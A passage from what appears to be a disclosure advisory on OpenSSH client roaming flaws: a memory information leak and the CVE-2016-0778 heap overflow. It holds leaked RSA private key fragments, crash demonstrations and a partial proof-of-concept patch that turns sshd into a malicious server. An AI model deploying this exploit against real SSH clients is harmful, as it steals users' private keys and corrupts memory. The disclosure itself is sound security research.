Si5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int 